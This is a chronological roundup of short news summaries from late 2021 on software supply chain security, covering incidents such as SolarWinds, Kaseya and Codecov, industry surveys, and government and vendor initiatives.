In 2020, the government established the cybersecurity maturity model certification (CMMC) as a verification process for defense industrial base (DIB) contractors within the DOD’s supply chain. The CMMC ensures that DIB companies implement cybersecurity practices and procedures that adequately protect federal contract information (FCI) and controlled unclassified information (CUI) within their networks.
_______________________________________________________________________________________
(Oct 13, 2021)
Mandating a zero-trust approach for software supply chains
In the wake of the SolarWinds attack last year, President Biden issued an executive order in May advocating for mandatory software bills of materials, or SBOMs, to increase software transparency and counter supply-chain attacks. Sounil Yu, CISO at JupiterOne, discusses software bills of materials (SBOMs) and the need for a shift in thinking about securing software supply chains.
_______________________________________________________________________________________
(Oct 12, 2021)
Risks posed by your third parties and supply chain
Most respondents to the PwC 2022 Global Digital Trust Insights Survey seem to have trouble seeing their third-party risks - risks obscured by the complexities of their business partnerships and vendor/supplier networks. Only 40% of survey respondents say they thoroughly understand the risk of data breaches through third parties, using formal enterprise-wide assessments.
.
_______________________________________________________________________________________
(Oct 12, 2021)
Over 90% of firms suffered supply chain breaches last year
Some 93% of global organizations have suffered a direct breach due to weaknesses in their supply chains over the past year, according to BlueVoyant. The cybersecurity services company polled 1200 IT and procurement leaders responsible for supply chain and cyber-risk management from global companies with 1,000+ employees to compile its report: Managing Cyber Risk Across the Extended Vendor Ecosystem.
_______________________________________________________________________________________
(Oct 12, 2021)
Software supply chain breaches are ‘staggeringly high’
According to a new report from BlueVoyant, software supply chain weaknesses have become pervasive in the enterprise. 97% of firms have been negatively impacted by a supply chain cybersecurity breach, with 93% admitting that they have suffered a direct cybersecurity breach because of weaknesses in their supply chain.
_______________________________________________________________________________________
(Oct 11, 2021)
More urgency is needed for supply chain security during holidays
Supply chain security issues only become bigger threats during the holiday season, according to Kyle Rice, CTO at SAP National Security Services (NS2). The holiday season is particularly ripe for nefarious threat actors because IT staffs are often reduced, employees are more distracted and businesses experience surges.
_______________________________________________________________________________________
(Oct 11, 2021)
SolarWinds-style supply chain attacks 'set to increase'
The hacking of the complex supply chains of major corporations areis likely to increase as agents try to replicate the chaos of the SolarWinds cyberattack on the United States, the head of Britain's cyber security has said. Such devastating attacks were likely to continue for years, alongside ransomware threats and the continued upheaval caused by the Covid-19 pandemic.
Ref - TheNationalNews
_______________________________________________________________________________________
(Oct 11, 2021)
The anatomy of an attack against a cloud supply pipeline
During the red team exercise, researchers took guidance from the strategies and techniques used by the attackers behind the SolarWinds Orion supply chain attack, in order to emulate a real-world threat and assess the security practices against known attacker techniques.
_______________________________________________________________________________________
(Oct 11, 2021)
How secure is your supply chain
Supply chain management is no longer only about procurement alone. With the rise of supply chain-based attacks, supply chain management, risk management, and IT are coming closer together and forming supply chain cyber resilience.
Ref - ITWeb
_______________________________________________________________________________________
(Oct 8, 2021)
Software supply chains: an introductory guide
Because software is made up of 3rd party component parts, attacks have shifted to target the supply chain. The attack against SolarWinds is maybe the best example, where a complex effort against multiple components enabled access to the company’s network and application monitoring platform—a system used by over 30,000 organizations.
_______________________________________________________________________________________
(Oct 8, 2021)
Supply chain attacks are now more costly than ever
Cyberattacks that exploit suppliers and partners to access a company's data are now more costly than ever, a new report from security firm Kaspersky suggests. According to the paper, the average financial impact of a supply chain attack against an enterprise reached $1.4 million this year, making it the most expensive type of incident.
_______________________________________________________________________________________
(Oct 8, 2021)
Data breach reports rise as supply chain attacks surge
Although supply chain attacks only count as a single attack, they impact multiple organizations and the individuals whose data is stored by them," ITRC says. "Sixty entities were impacted by 23 third-party or supply chain attacks, including eight attacks that were reported in previous quarters.
_______________________________________________________________________________________
(Oct 7, 2021)
Why are MSPs prime targets for cybercriminals and APTs?
In recent years, supply chain attacks have gone from rare to increasingly common, and the payoff for threat actors of all stripes that successfully compromise a Managed Service Provider (MSP) far outweighs either the investment or risk.
_______________________________________________________________________________________
(Oct 6, 2021)
Using cloud-native buildpacks to address software supply chain security requirements
There are numerous ways to cause a software supply chain attack. Generally speaking, as software components move up the deployment pipeline, they are authenticated in order to work. These components should be able to access various internal pieces that comprise the host infrastructure.
Ref - InfoQ
_______________________________________________________________________________________
(Oct 5, 2021)
Open-source software and supply chain security
"The software supply chain is fragile" according to Forrester’s report: "The Top Security Technology: "The Top Security Technology Trends to Watch, 2021". This challenge is not breaking news for open-source advocates. How do you secure a supply chain for a product that has no physical form, no box to lock, and is created in an environment where anyone can contribute to it?
_______________________________________________________________________________________
(Oct 5, 2021)
Anatomy of a supply chain attack
Using the Codecov security breach as an example, threat intelligence experts explained the timeline of various supply chain events. This included how it took approximately two months for the breach to be discovered, another two weeks for the first indicator to be shared (an IP address), and two more weeks for athe second round of indicators to be published.
_______________________________________________________________________________________
(Oct 5, 2021)
Supply chain risk matters when it comes to cybersecurity for next-gen 911
Senate Bill 2754 provides $10 billion to help facilitate the transition from legacy public safety networks to the NG911 standard by distributing grants to local agencies responsible for 911. But the supply chain hole related to this is glaring: It has no provisions to Buy American or even consider supply chain risk.
_______________________________________________________________________________________
(Oct 4, 2021)
Securing government supply chains with critical access management
Incorrect trust relationships form when governments treat their third parties and supply chain like employees. Granting a third party the same access with the same level of security and trust as a government employee is opening up the door to a compromised network. The reality is that this fails to fully secure third-party access because organizations do not directly control third parties or supply chains.
_______________________________________________________________________________________
(Oct 4, 2021)
Google paying more to developers to make projects more secure against supply chain risks
Google is backing a new project from the Linux Foundation to the tune of $1 million that aims to bolster the security of critical open-source projects. Rather than a bug bounty, Google's latest investment – a part of its $10 billion pledge to President Biden's cybersecurity push – seeks to address potential security issues before they become bugs through improvements in hardening software against attacks.
_______________________________________________________________________________________
(Oct 1, 2021)
Supply chain security: mapping the key threats to business
Many hackers will tailor their cyber-attack methods according to whereabouts in the supply chain ecosystem they are targeting. For instance, attackers may use different tricks to target different business sectors such as Manufacturing, Logistics, or Retail. By applying diligence and best practices, and understanding upstream and downstream threats and dependencies, businesses can safeguard their operational integrity and build trust with other businesses that sit throughout their supply chains.
_______________________________________________________________________________________
(Oct 1, 2021)
Unwanted gift: ransomware and supply chain attacks
Even a cursory glance at the recent Kaseya attack gives security professionals a window into why this unfortunate combination is such a prevalent threat. The attack generated a ransom demand of over $70 million, which Kaseya has denied paying. However, regardless of whether a ransom payment was made, REvil nevertheless received an immense return on their investment by gaining access to networks belonging to over one thousand organizations, including 100 pre-schools in New Zealand.
_______________________________________________________________________________________
(Sept 30, 2021)
Using vendor management to defend against supply chain attacks
The second quarter of 2021 brought another increase for supply chain attacks, with the number of incidents growing by 19% to 32. The 59 supply chain attacks detected through June fell just behind the 70 malware-related compromises in H1 2021. So, it is predicted that third-party risks stemming from supply chain attacks and other incidents will surpass malware as the third most common source of breaches by the end of the year.
_______________________________________________________________________________________
(Sept 30, 2021)
Shades of SolarWinds attack malware found in new 'Tomiris' backdoor
Researchers at Kaspersky said they had detected a new backdoor they have dubbed "Tomiris," which has multiple attributes that suggest a link to "Sunshuttle," a second-stage malware that DarkHalo used in its SolarWinds campaign. This includes the programming language used to develop Tomiris, its obfuscation and persistence mechanisms, and the general workflow of the two malware samples.
_______________________________________________________________________________________
(Sept 30, 2021)
Securing the supply chain has become a much bigger issue
Most high-level executives are highly confident in the cybersecurity of their supply chain, despite lacking a comprehensive understanding of the essential components that make a software supply chain secure, a new report has claimed. In its “Global C-suite security survey” report, CloudBees found 95% of respondents described their software supply chains as secure, while 93% said they were ready to handle a ransomware attack or a similar threat against their supply chain.
_______________________________________________________________________________________
(Sept 30, 2021)
Supply chain emerging as a cloud security threat
Matt Chiodi, CSO of public cloud at Palo Alto Networks, explained that supply chain flaws in the cloud are difficult to detect because of the massive number of building blocks that go into even a basic cloud-native application. The report highlights how vulnerabilities and misconfigurations can quickly snowball within the context of the cloud software supply chain, and called for organizations to “shift security left.”
Ref - Security Boulevard
_______________________________________________________________________________________
(Sept 29, 2021)
Leveraging threat intelligence to tackle supply chain vulnerabilities
The first component of the supply chain attack begins with the identification of a vulnerable supplier who is digitally connected to an organization(s) with highly valuable data. Next, the target organization is infiltrated, valuable data exfiltrated, and lateral movement to connected consumer organizations is executed as the secondary phase of attack and cycle repeats itself through as many exploitable connections that are available.
_______________________________________________________________________________________
(Sept 29, 2021)
‘Tomiris’ backdoor linked to SolarWinds malware
Researchers have discovered a campaign delivering a previously unknown backdoor they’re calling Tomiris. Namely, Tomiris has a number of similarities to the Sunshuttle second-stage malware (aka GoldMax) that was distributed by Nobelium (aka DarkHalo). The targeting of the Tomiris campaign shows a number of overlaps with Kazuar, a backdoor linked to the Turla APT, first reported by Palo Alto in 2017 (though its development goes back to 2015).
_______________________________________________________________________________________
(Sept 28, 2021)
How one red team exercise averted a new SolarWinds-style attack
An undisclosed company engaged Unit 42’s services to break into its cloud software development environment. The Unit 42 red team took advantage of misconfigurations in the development environment to take control of the customer’s software development process in a similar fashion to how a Russia-linked advanced persistent threat (APT) group was able to penetrate SolarWinds’ platform to introduce a tainted code update.
_______________________________________________________________________________________
(Sept 28, 2021)
How nation-state attackers like NOBELIUM are changing cybersecurity
Numerous organizations were impacted by the NOBELIUM attacks. In this supply chain attack, hackers were able to access the SolarWinds code, slip malicious code into a piece of the software, and use the vendor’s legitimate software updates to spread their malware to customer systems. Successful attacks gave NOBELIUM hackers high-level permissions on the downstream compromised systems.
_______________________________________________________________________________________
(Sept 28, 2021)
Cloud companies are looking to tighten their defenses against supply chain attacks
Part of the reason most cloud environments can be exploited is that they're complex and can be difficult to secure – it's understandably not a simple task and vulnerabilities and misconfigurations can snowball to the extent that with patience and the right skills, attackers could exploit access to service providers and leave customers vulnerable to attacks.
_______________________________________________________________________________________
(Sept 28, 2021)
New cloud threat research on software supply chain attacks
For their latest Cloud Threat Report, the Unit 42 team analyzed data from a variety of public data sources and also executed a red team exercise on the software development environment of a large SaaS provider (a customer of Palo Alto Networks) at their request. Their findings indicate that many organizations may have a false sense of security regarding their cloud infrastructure and protection procedures.
_______________________________________________________________________________________
(Sept 28, 2021)
Understanding supply chain attack, and what to do about it
Supply chain attacks will increase in 2021. Part of this expansion comes from increased application environment complexity: companies embrace the need for agile and adaptable supply chains that are resistant to future disruptions. After all, broadening the number of connected apps and services helps enterprises better navigate changing market conditions.
_______________________________________________________________________________________
(Sept 24, 2021)
Supply chain and ransomware threats drove 60% increase in Global Cyber Intelligence sharing among financial firms
FS-ISAC announced that global cyber intelligence sharing among its member financial firms increased by 60% in the period from August 2020 to August 2021, driven by supply chain and ransomware threats. Large scale threats resulted in record-breaking peaks of intelligence sharing across all regions: North America; Latin America; Europe, the UK, the Middle East, and Africa; and the Asia Pacific.
Ref - Dark Reading
_______________________________________________________________________________________
(Sept 24, 2021)
Supply chain risks in open source projects
With the rapid growth in the use of open-source projects for development activities, it is crucial to safeguard against the possibility of falling prey to such attacks. Before directly importing open source dependencies in the package manager, it is worth reviewing their associated security vulnerabilities. This can be achieved manually by analyzing all open source components for any known security vulnerabilities or can be done using automated software composition analysis solutions.
Ref- Analytics Insight
_______________________________________________________________________________________
(Sept 23, 2021)
Here's a fix for open source supply chain attacks
Vendors are evolving beyond their original areas of core competency, extending their functional base horizontally in order to deliver a more comprehensive, integrated developer experience. From version control to monitoring, databases to build systems, every part of an application development workflow needs to be better and more smoothly integrated.
Ref - Tech Republic
_______________________________________________________________________________________
(Sept 22, 2021)
Advanced software supply chain attacks spike
Dependency confusion incidents were the most prevalent software supply chain attacks in the previous year, followed by typosquatting and malicious source code injections. Dependency confusion involves figuring out the names of internal packages for a particular company’s application and then publishing a package with the same name but a higher semantic version of a package already in use.
_______________________________________________________________________________________
(Sept 22, 2021)
How software supply chain attacks happen and how to mitigate them
The primary software supply chain attack vector boils down to exploitable vulnerabilities residing in reused code, linked libraries, or third-party executables. Software reuse is on the rise, and many developers depend on open source software, which is susceptible to known and unknown vulnerabilities. While open-source projects issue patches in a reasonable amount of time, many organizations never install them.
_______________________________________________________________________________________
(Sept 21, 2021)
Managing cyber risk through integrated supply chains
It is important to assess potential threat sources and inherent risks across the supply chain, leveraging industry good practice. Look closely at the attack paths that could be taken to undermine the operations. Supply chain/partner organizations should be obliged to manage the handling of the data in line with any agreed good practice standard.
Ref - Computer Weekly
_______________________________________________________________________________________
(Sept 21, 2021)
Securing the Edge in the supply chain
Edge computing is becoming a necessity in supply chain management as organizations want the ability to precisely track the status, location, and expected arrival time of components and other deliveries. Because of the large amounts of data generated by the supply chain and its wide-ranging attack surface, organizations need to consider cybersecurity layers to secure the edge.
_______________________________________________________________________________________
(Sept 21, 2021)
Cybersecurity awareness must include the entire web supply chain
At this point in the history of digital code, third-party vendors have become the norm rather than the exception. Not only are they present across websites and mobile applications, but also they often handle the bulk of user functionality. Through third-party assets, the web can be used by malicious actors to track, target, and deliver malware payloads to users.
Ref - Forbes
_______________________________________________________________________________________
(Sept 20, 2021)
Agencies seek comments on supply chain security of critical software
The departments of Commerce and Homeland Security are looking to incorporate comments on cybersecurity design details into a report on the supply of information and communications technology required by executive order. Areas highlighted for comment in Monday’s Federal Register notice tracked closely with those identified in the executive order and relate to cross-cutting supply-chain concerns.
_______________________________________________________________________________________
(Sept 20, 2021)
Businesses are failing to protect software supply chains
According to a new report from the identity management company Venafi, a poll of more than 1,000 IT and software development professionals has been carried out. It states that the overwhelming majority (94 percent) believe there should be “clear consequences” for software vendors that fail to protect the integrity of their software build pipelines.
_______________________________________________________________________________________
(Sept 17, 2021)
Software supply chain attack explained
Software supply chain attacks are just one type of supply chain attack. But there are also different subtypes of software supply chain attacks that security-conscious organizations need to understand. The National Institute of Standards and Technology (NIST) identifies six types of software supply chain attacks: Design, Development & Production, Distribution, Acquisition and deployment, Maintenance, and Disposal.
_______________________________________________________________________________________
(Sept 17, 2021)
SushiSwap's MISO launchpad hit by $3 million supply chain attack
SushiSwap's chief technology officer says the company's MISO platform has been hit by a software supply chain attack. CTO Joseph Delong announced that an auction on MISO launchpad had been hijacked via a supply chain attack. An "anonymous contractor" with the GitHub handle AristoK3 and access to the project's code repository had pushed a malicious code commit that was distributed on the platform's front end.
Ref - ARS Technica
_______________________________________________________________________________________
(Sept 16, 2021)
Azure zero-day flaws highlight lurking supply-chain risk
Four Microsoft zero-day vulnerabilities in the Azure cloud platform’s Open Management Infrastructure (OMI) show that OMI represents a significant security blind spot. Dubbed OMIGOD, a series of vulnerabilities in the Open Management Infrastructure used in Azure on Linux demonstrate hidden security threats and affect thousands of Azure customers and millions of endpoints.
Ref - Threat Post
_______________________________________________________________________________________
(Sept 15, 2021)
Why open-source software supply chain management is worse than you think
The seventh annual State of the Software Supply Chain Report has revealed that a majority of respondents use an ad hoc approach to software supply chain management for most parts of the process, except for remediation and inventory. The analysis revealed that 29% of popular open-source projects contain at least one known security vulnerability compared to only 6.5% of less popular OSS projects.
_______________________________________________________________________________________
(Sept 15, 2021)
Supply chain attacks against the open-source ecosystem soar by 650%
The last year has seen a massive rise in the number of software supply chain attacks aimed at upstream public repositories, a new report has revealed. According to Sonatype’s annual State of the Software Supply Chain Report, such attacks numbered more than 12,000 – a 650% rise in 2020, which itself revealed a 430% increase in 2019.
_______________________________________________________________________________________
(Sept 15, 2021)
Execs concerned about software supply chain security, but not taking action
According to ENISA, supply chain attacks, such as SolarWinds, Codecov, and Kaseya, are expected to increase by a factor of four in 2021. Executives are clearly much more concerned about their vulnerability to software supply chain attacks and aware of the urgent need for action.
Ref - HelpNetSecurity
_______________________________________________________________________________________
(Sept 15, 2021)
Supply chain attacks on open source repositories are reaching new highs
There has been a whopping 650% year-over-year increase in supply chain attacks aimed at upstream open-source public repositories, according to a new report. Interestingly, despite the risk, cybersecurity company Sonatype’s seventh annual State of the Software Supply Chain Report notes strong growth in the supply and demand of open-source software.
_______________________________________________________________________________________
(Sept 15, 2021)
What the Kaseya attack can teach local governments about preventing third-party data breaches
There are ways to minimize, or at the very least mitigate, the risks associated with supply chain attacks. In a recent report on the state of third-party security, 44% of organizations surveyed said they had experienced a third-party data breach within the last 12 months. Of those organizations, 74% attributed the breach to giving too much privileged access to third parties.
Ref - Security Magazine
_______________________________________________________________________________________
(Sept 15, 2021)
Who bears the brunt of supply chain attacks?
A survey by Venafi shows that most of the Executives are not taking action that will drive change. While 94% of executives believe there should be clear consequences for software vendors that fail to protect the integrity of their software build pipelines, most have done little to change the way they evaluate the security of the software they purchase and the assurances they demand from software providers.
_______________________________________________________________________________________
(Sept 13, 2021)
Ways to improve cyber resilience against ransomware, supply chain attacks
There are some common vital steps we can all take to protect sensitive data. This includes a renewed focus on database security, collaborating across the private/public sector, enabling continuous monitoring, mitigation and testing, training and retaining cybersecurity experts, and when thinking about security assuming that agencies will come under attack.
Ref - GCN
_______________________________________________________________________________________
(Sept 13, 2021)
Can advanced code-signing help end supply chain attacks?
The software company signs every piece of code with the private key, and recipients check the validity with the public key. Unfortunately, once hackers have access to a code-signing key, either through theft or by gaining access to a build server and tricking the system, they can easily disguise their malware. They only need one piece of signed code to gain back-door access to networks, and there’s a vast range of potential victims.
Ref - SCMagazine
_______________________________________________________________________________________
(Sept 10, 2021)
Securing the supply chain in the age of hybrid work
In today’s connected world, everyone—from device manufacturers to consumers—has a responsibility to improve cybersecurity by working together. Companies must seek out vendors that can provide security assurance, as well as realize the need to upgrade their security posture to maintain customer trust and prevent cyber disasters. The more informed an organization is about its devices, the stronger its supply chain security posture will be.
_______________________________________________________________________________________
(Sept 8, 2021)
Security at scale in the open-source supply chain
Instead of the one-by-one approach to patching, security professionals need to start thinking about securing entire classes of vulnerabilities. It’s true that there is no current catch-all mechanism for such efficient action. But researchers can begin to work together to create methodologies that enable security organizations to better prioritize vulnerability risk management (VRM) instead of filing each one away to patch at a later date.
_______________________________________________________________________________________
(Sept 7, 2021)
Combatting defense supply chain and critical infrastructure vulnerability with AI
Assessing defense supply chain risk boils down to understanding the relationships of the contracting organizations that support the government’s mission. Using advanced technology, including artificial intelligence and machine learning processes, supply chains can be mapped and potential gaps or pain points identified, from connections with sanctioned parties and adversary-controlled entities to distribution bottlenecks and sole-source suppliers.
_______________________________________________________________________________________
(Sept 4, 2021)
Microsoft says Chinese hackers were behind SolarWinds Serv-U SSH 0-day attack
Microsoft has shared technical details about a now-fixed, actively exploited critical security vulnerability affecting SolarWinds Serv-U managed file transfer service that it has attributed with "high confidence" to a threat actor operating out of China. In mid-July, the Texas-based company remedied a remote code execution flaw (CVE-2021-35211) that was rooted in Serv-U's implementation of the Secure Shell (SSH) protocol.
_______________________________________________________________________________________
(Sept 2, 2021)
Autodesk was one of the 18,000 firms breached in SolarWinds attack
Autodesk, makers of computer-aided design (CAD) software for manufacturing, has told the US stock market it was targeted as part of the supply chain attack on SolarWinds' Orion software. In a filing with the American Stock Exchange Commission, Autodesk said it had identified a compromised server in the wake of public reporting of the SolarWinds breach.
_______________________________________________________________________________________
(Sept 2, 2021)
What Biden’s cybersecurity executive order means for supply chain attacks
One major outcome of the executive order is baselining. People may disagree what would constitute ‘critical’, but at least there is a formal definition in the books now. Critical software as mentioned in the executive order is defined as any software that has, or has direct software dependencies upon, one or more components with at least one of the given attributes.
Ref - Security Intelligence
_______________________________________________________________________________________
(Sept 2, 2021)
A deep-dive into the SolarWinds Serv-U SSH vulnerability
Several weeks ago, Microsoft detected a 0-day remote code execution exploit being used to attack the SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributed the attack with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.
Ref - Microsoft
_______________________________________________________________________________________
(Sept 1, 2021)
How to stop supply chain attacks in their tracks
While agencies like the FBI and CISA have been warning for some time that MSPs are likely targets of advanced persistent threats (APTs), the Kaseya attack seems to have crossed a threshold. The problem is a significant security challenge, and one that some think only vendors can solve.
_______________________________________________________________________________________
(Aug 31, 2021)
A data breach may be lurking in your software supply chain
The software supply chain is clearly an increasing target for intrusion. And that’s exactly where a lot of sensitive data resides. The unfortunate reality is that sensitive information in non-prod environments goes largely unprotected. Recent research shows 56% of enterprise customers don’t anonymize sensitive data in test environments.
Ref - Security Boulevard
_______________________________________________________________________________________
(Aug 31, 2021)
Cyberattacks use Office 365 to target supply chain
Supply chain attacks starting in Office 365 can take on many different forms. For instance, spear phishers can use a compromised Office 365 account to scout out a targeted employee’s ongoing emails. They can then use what they learn to go after vendors and suppliers with business email compromise fraud attacks.
_______________________________________________________________________________________
(Aug 30, 2021)
How executive order requirements will change the scope of business
It is anticipated that the technical requirements under the EO will be applied broadly across the software industry. Each software vendor will have to compete commercially alongside the companies that are directly subject to the EO’s rules. Failing to meet the increased security and transparency requirements that the EO will impose will, for many, translate into a competitive disadvantage in the marketplace.
_______________________________________________________________________________________
(Aug 30, 2021)
How to fix the weakest link in cyber security
Many small and medium-sized businesses (SMBs) might think they are immune from cyber attacks. However, recent research shows that is no longer the case. Almost a third (28%) of data breaches in 2020 involved small businesses, and more than 22% of SMBs have suffered a security breach due to a remote worker since the beginning of the COVID-19 outbreak.
Ref - IT Pro
_______________________________________________________________________________________
(Aug 27, 2021)
Supply chain cyber security is only as strong as the weakest link
A primary method used by criminals to attack supply chains is impersonation, which can be remarkably sophisticated. Cybercriminals can spend months stalking employees’ social media accounts and company press releases in order to work out details of a supply chain, deducing where they might insert themselves to fraudulently divert invoices or encourage employees to engage with phishing scams.
_______________________________________________________________________________________
(Aug 27, 2021)
A new threat is coming from inside Docker container images
Aqua Security's threat research arm, Team Nautilus, has found five images accounting for a whopping 120,000 pulls by unsuspecting users. Team Nautilus is further warning that the malicious Docker images could be part of a larger software supply chain attack with its eyes on disrupting cloud-native environments.
_______________________________________________________________________________________
(Aug 27, 2021)
Cyber experts seek clarity on the NIST supply chain framework
Cyber experts agree a technology supply chain security framework developed by the National Institute of Standards and Technology will be a useful tool for agencies and industry. They are less sure about what it will look like. The prevailing theory is the new framework will focus primarily on the software supply chain —in light of the recent Microsoft Exchange server attacks, the Kaseya ransomware attack, and the SolarWinds breach.
_______________________________________________________________________________________
(Aug 26, 2021)
White House unveils supply chain, new security initiatives
The Biden administration unveiled a new package of supply chain and critical infrastructure security initiatives following a meeting at the White House with about 25 tech, banking, insurance, and infrastructure executives. The initiatives feature a pledge by several companies, including tech giants Microsoft, Google and IBM, and insurers Travelers and Coalition, and the U.S. NIST, to create a framework to build more security into the nation's technology supply chain to help ensure its integrity, according to a fact sheet released by the White House.
_______________________________________________________________________________________
(Aug 26, 2021)
Realtek flaw exposes dozens of brands to supply chain attacks
German security firm IoT Inspector reports that the Realtek bug, tracked as CVE-2021-35395, affects over 200 Wi-Fi and router products from 65 vendors, including Asus, Belkin, China Mobile, Compal, D-Link, LG, Logitec, Netgear, ZTE, and Zyxel. The flaw is located in a Realtek software developer kit (SDK) and is currently under attack from a group using a variant of the IoT malware, Mirai.
_______________________________________________________________________________________
(Aug 26, 2021)
Cybersecurity professor works to close the door on hackers
Santiago Torres Arias, an assistant professor of electrical and computer engineering at Purdue, said a cumulative increase of 500% in the number of software supply chain compromises is giving hackers the weak link they need to attack a system. Torres Arias said that in supply chain security, hackers will search to find that one program in a chain of software that is vulnerable and hacks it.
_______________________________________________________________________________________
(Aug 26, 2021)
Apple: It's time to bolster supply chain security
Apple announced it will establish a new program to drive continuous security improvements throughout the technology supply chain. As part of that program, Apple will work with its suppliers - including more than 9,000 in the United States - to drive the mass adoption of multi-factor authentication, security training, vulnerability remediation, event logging, and incident response.
_______________________________________________________________________________________
(Aug 26, 2021)
Google - Updates on collaboration with NIST to secure the software supply chain
Google participated in President Biden’s White House Cyber Security Summit where it shared recommendations to advance the administration’s cybersecurity agenda. This included its commitment to invest $10 billion over the next five years to expand zero-trust programs, help secure the software supply chain, and enhance open-source security.
_______________________________________________________________________________________
(Aug 26, 2021)
Taking control of cyber attacks
Organizations, as well as supply chains, have been blind-sided with new, sophisticated, and frequent tactics, causing CXOs and IT teams to scramble for protection and remediation. It may seem that cyber adversaries are running with the ball unobstructed toward the end zone, but it’s time to block and tackle them before they get yet another touchdown.
_______________________________________________________________________________________
(Aug 26, 2021)
How does PCI DSS prevent supply-chain attacks
The PCI Council recognized the growing level of risk exposure and so, in its PCI DSS 3.2 iteration highlighted the significance of mitigating and management of the third-party risk. The PCI DSS requirement calls for measures ensuring compliance throughout the data supply chain.
_______________________________________________________________________________________
(Aug 25, 2021)
Apple, Microsoft and Amazon chiefs to meet Biden over critical infrastructure cyber attacks
US President Joe Biden has invited Apple CEO Tim Cook, Microsoft CEO Satya Nadella, and Amazon president and CEO Andy Jassy to the White House to discuss how the private sector can help combat ransomware and software supply chain attacks.
Ref - MSN
_______________________________________________________________________________________
(Aug 24, 2021)
Supply chain vulnerability in cloud connectivity platform threatens 83 Million IoT devices
A supply chain vulnerability in the ThroughTek “Kalay” network, a cloud-based communications platform used by an estimated 83 million Internet of Things (IoT) devices, could allow for remote compromise and control to include monitoring audio and video feeds and exposing passwords.
Ref - CPO Magazine
_______________________________________________________________________________________
(Aug 24, 2021)
Supply chain attacks - vendors are at risk
Supply chain attacks piggyback legitimate processes to gain uninhibited access into a business's ecosystem. This attack begins with infiltrating a vendor's security defenses. This process is usually much simpler than attacking a victim directly due to the unfortunate myopic cybersecurity practices of many vendors.
_______________________________________________________________________________________
(Aug 23, 2021)
SSDF: The Key to Defending Against Supply Chain Cyberattacks
One of the best modern ways to combat the supply chain cyberattacks is to integrate a secure software development framework (SSDF) into a vendor’s software development life cycle (SDLC). The SSDF provides software vendors with a framework by which they can implement security measures and cut down on cyberattacks.
Ref - Security Intelligence
_______________________________________________________________________________________
(Aug 20, 2021)
A year of supply chain attacks: Ways to protect SDLC
Developers must make sure that any third-party pieces used by them don’t have security or compliance gaps, such as an unpatched critical vulnerability, malware, or a misconfigured setting. Otherwise, their software can put employees and customers at risk for security and compliance breaches. In addition, it is said that lack of visibility into the makeup of commercial and open-source software can be improved with software bills of materials (SBOMs).
_______________________________________________________________________________________
(Aug 20, 2021)
How to protect supply chains from ransomware attacks
Supply chains critical to the energy, food, and IT infrastructures are increasingly at risk, and threat actors are coming up with more sophisticated ways to exploit vulnerabilities within these supply chains. Because of this, traditional cybersecurity tactics are no longer enough, and this applies not just to large and prominent organizations but to smaller businesses as well.
_______________________________________________________________________________________
(Aug 18, 2021)
Lifting the veil on cyber vulnerabilities in government supply chain pipelines
It is important that the security team should be helping to assess the safety of third-party additions to the tech stack, but decisions can be made based on a business need with little choice among solutions. At this point, it can be a trust exercise. Does the vendor care about security as much as your company does? And can the vendor actually assess the risks as only you could understand them, as well as the assets you need to protect?
Ref - TechCrunch
_______________________________________________________________________________________
(Aug 18, 2021)
Supply chain attacks on IoT - Million+ devices are vulnerable
Taiwanese chip designer Realtek has warned of four recent vulnerabilities in three SDKs in its WiFi modules. Realtek also published an advisory regarding those flaws used in almost 200 products made by multiple vendors. The vulnerabilities allow remote access without authentication by the attacker. Also, the flaws can lead to service denial, device crashes, inject arbitrary commands, and finally gain complete control of the device's highest level of privilege.
Ref - Medium
_______________________________________________________________________________________
(Aug 18, 2021)
Iranian hackers target several Israeli organizations with supply-chain attacks
IT and communication companies in Israel were at the center of a supply chain attack campaign spearheaded by an Iranian threat actor that involved impersonating the firms and their HR personnel to target victims with fake job offers. The attacks have been linked to a hacker group called Siamesekitten (aka Lyceum or Hexane) that has primarily singled out oil, gas, and telecom providers in the Middle East and in Africa at least since 2018
_______________________________________________________________________________________
(Aug 18, 2021)
Software composition analysis can help protect the software supply chain
Protecting the software supply chain is a multifaceted challenge that includes code signing, identity, and access management, policy and software composition analysis (SCA). SCA has always played a role in protecting the software supply chain, historically by identifying vulnerabilities and licensing risks in open source libraries and advising security and development teams on upgrade paths.
Ref - Forrester
_______________________________________________________________________________________
(Aug 18, 2021)
Supply chain attacks are closing in on MSPs
Like a technology that advances through state-sponsored R&D but then becomes available to a wider public, recent supply chain attack techniques were honed by state-backed actors but have now been adopted by more run-of-the-mill ransomware actors. This is bad news for MSPs. While agencies like the FBI and CISA have been warning for some time that MSPs are likely targets of advanced persistent threats (APTs), the Kaseya attack seems to have crossed a threshold.
_______________________________________________________________________________________
(Aug 17, 2021)
How to accelerate U.S. supply chain and security innovation
Dr. Tommy Gardner, Chief Technology Officer of HP Federal, believes a proactive mindset that bridges the digital divide, recruits top talent and implements the right policies is needed for the U.S. to achieve success and remain competitive on a global scale. According to him, a national strategy for critical technologies can shape the industries of the future as well as address national security and global challenges.
Ref - Security Magazine
_______________________________________________________________________________________
(Aug 16, 2021)
ENISA predicts fourfold increase in software supply chain attacks in 2021
The European Union Cybersecurity Agency (ENISA) warns of increasing supply chain attacks in 2021 as advanced persistent threat actors (APTs) employ more sophisticated techniques exceeding targeted attacks. The agency studied 24 supply chain attacks from January 2020 to July 2021 and found that strong security protection is no longer effective in defending against these forms of cyber-attacks.
_______________________________________________________________________________________
(Aug 16, 2021)
5 Ways to defend against supply chain cyberattacks
Security Intelligence recommends five keys to start proactively reducing supply chain attack risk: Inform developers about cyberattacks, Monitor open-source projects, Implement zero trust, Use built-in data protection and Focus on third-party risks.
_______________________________________________________________________________________
(Aug 16, 2021)
Devices from many vendors can be hacked remotely due to flaws in Realtek SDK
A large number of IoT systems could be exposed to remote hacker attacks due to serious vulnerabilities found in software development kits (SDKs) provided to device manufacturers by Taiwan-based semiconductor company Realtek. The list of impacted manufacturers and vendors includes ASUS, Belkin, D-Link, Huawei, LG, Logitech, Netgear, ZTE, and Zyxel.
_______________________________________________________________________________________
(Aug 16, 2021)
Do open-source supply chains leave security gaps in organizations?
Infiltrating open source libraries can also be a more covert approach than directly attacking organizations — if it’s already part of a trusted supply chain, its malicious activity will be detected. Attacking an organization directly is tricky and will typically be harder and yield slower and fewer results.
_______________________________________________________________________________________
(Aug 16, 2021)
Companies need to finally embrace zero-trust
